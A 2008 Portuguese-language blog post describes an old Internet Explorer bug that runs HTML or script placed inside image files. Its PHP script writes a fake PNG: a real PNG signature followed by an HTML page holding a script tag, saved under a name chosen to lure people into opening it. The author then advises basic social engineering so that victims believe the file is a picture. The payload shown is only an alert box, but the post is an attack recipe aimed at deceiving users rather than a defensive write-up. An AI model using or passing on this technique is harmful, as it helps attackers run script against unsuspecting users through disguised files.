dez 6 2008

Usando XSS em Imagens

O Internet Explorer possui um bug que permite a execução de código HTML em qualquer tipo de arquivo(png, jpg, gif, txt,etc). Isso ocorre quando a requisição da imagem é feita pela URL (não atravéz de <img> u.u) e não é encontrado algum mime-type. Versões mais recentes do browser já possuem este bug corrigido, mas grande maioria usa IE6 e IE7 sem atualizar, rodei em vários simuladores do IE7 e funcionaram.

O primeiro passo é criar um arquivo com alguma extensão que seja válido que contenha o código que queremos executar:

<?php
/*
   arquivo: pngmaker.php
   script simples para criar arquivos png
*/
$buffer  = "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A"; // Assinatura
$buffer .= "\x00\x00\x00\x0D";                 // Chunk size
$buffer .= "\x00\x00\x00\x0D";                 // Chunk id
$buffer .= "\x00\x00\x00\x01";                 // image width
$buffer .= "\x00\x00\x00\x01";                 // image height
 
$buffer .= "<html><body><script>alert('Examplo');</script></body></html>";
 
$imagem = fopen("mulher-jaca.png", "w");   //foi usado esse nome para atrair os bronhamans
fwrite($imagem, $buffer);  
fclose($imagem);  
 
?>

Depois só utilizar uma engenharia social básica, pelo cara acreditar se tratar de uma imagem, logo quase nenhum usuário vai achar que em uma imagem pode conter um script.



DEIXE UM COMENTÁRIO

Subscrever

Subscreve o Blog



Publicidade

Comentários Recentes

  • Jefferson Ferreira de brito: eu quero muito
  • thiago valente: Eu quero um para mim
  • Lucas martins balieiro: Eu não fiz o enem mesmo assim eu posso me inscrever no site essa é minha dúvida, só queme...
  • Francisca Marli Oliveira: quero saber quanto tenho no meu fgts
  • Santiago ribeiro de oliveira: Eu tô com carteira registrada eu tenho direito

Links

Leitores Recentes

VALE O CLIQUE!

Site Seguro Ocioso

Divulgue o blog Infomaroto em seu site e tenha seu link ou banner aqui.
Blog Infomaroto